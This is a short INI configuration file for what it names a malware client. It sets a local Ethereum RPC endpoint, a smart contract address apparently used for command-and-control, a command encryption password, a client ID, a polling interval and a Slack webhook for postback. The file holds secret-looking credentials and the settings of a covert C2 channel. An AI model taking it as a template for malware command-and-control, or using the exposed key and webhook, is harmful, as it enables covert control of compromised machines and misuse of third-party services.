[DEFAULT]
Web3ProviderUri = http://127.0.0.1:7545
SmartContractAddress = 0x08CFcd418217AEAfE0b08A69a7abe5Bdd1600948
CommandEncryptionPassword = nwrucUoQebqdOMyd5IhFKYQtWA8JBzox-yZH_KvOKWs=
MalwareClientID = 1
PollInterval = 5
SlackPostback = https://hooks.slack.com/services/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
